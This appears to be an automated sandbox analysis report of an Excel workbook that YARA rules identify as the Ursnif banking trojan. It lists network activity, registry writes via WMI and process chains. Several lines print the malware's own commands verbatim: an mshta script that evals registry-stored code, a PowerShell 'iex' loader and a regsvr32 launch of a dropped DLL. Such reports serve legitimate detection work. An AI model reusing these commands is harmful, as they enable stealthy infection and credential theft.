                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://powerlift.acompli.net
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://settings.outlook.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://shell.suite.office.com:1443
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://skyapi.live.net/Activity/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://staging.cortana.ai
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://store.office.cn/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://store.office.com/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://store.office.de/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://tasks.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://templatelogging.office.com/client/log
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://web.microsoftstream.com/video/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://webshell.suite.office.com
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://wus2.contentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://wus2.pagecontentsync.
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                  Source: 3A4E1985-998D-4759-B374-77BB71813A62.1.drString found in binary or memory: https://www.odwebp.svc.ms
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownHTTPS traffic detected: 162.241.253.78:443 -> 192.168.2.3:49725 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

                  E-Banking Fraud:

                  barindex
                  Yara detected UrsnifShow sources
                  Source: Yara matchFile source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB39C5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                  System Summary:

                  barindex
                  Office process drops PE fileShow sources
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dllJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\Documents\decrypt.dllJump to dropped file
                  Writes or reads registry keys via WMIShow sources
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Writes registry values via WMIShow sources
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E8005 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB2D06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB8005 NtQueryVirtualMemory,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E2206
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E3109
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E7DE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB2206
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB7DE0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 19_2_00FB3109
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                  Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@31/52@7/2
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E513E CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,FindCloseChangeNotification,
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_01
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{C75402C6-E233-4D86-BA8E-1D986541630A} - OProcSessId.datJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                  Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
                  Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\Documents\decrypt.dll
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5008 CREDAT:17410 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17410 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17416 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:82956 /prefetch:2
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5500 CREDAT:17428 /prefetch:2
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: documentation_39236.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000002F.00000002.582791755.000001E9AE630000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583021854.0000021D92B10000.00000002.00000001.sdmp
                  Source: Binary string: mscorlib.pdb source: csc.exe, 0000002F.00000002.590444392.000001E9B11EC000.00000002.00000001.sdmp
